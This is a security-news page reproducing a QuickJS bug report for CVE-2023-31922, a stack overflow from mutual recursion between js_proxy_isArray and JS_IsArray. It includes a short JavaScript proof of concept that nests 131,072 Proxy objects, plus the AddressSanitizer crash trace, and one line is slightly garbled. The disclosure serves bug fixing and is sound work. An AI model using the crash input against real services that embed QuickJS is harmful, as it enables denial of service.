Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31922: AddressSanitizer: stack-overflow · Issue #178 · bellard/quickjs

QuickJS commit 2788d71 was discovered to contain a stack-overflow via the component js_proxy_isArray at quickjs.c.

CVE
Open in Source
#ubuntu#linux#js

QuickJS Version

Version : 2788d71

platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoCtestcase

Array . isArray ( [ ] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( [ ] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( [ ] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r = new Proxy ( [ ] , { } ) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;

// poc.js for (var r = new Proxy ([],{}) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy (r, {}); Array . isArray ®;

Execution steps & Output

The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
infinite loop occurs here.

$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE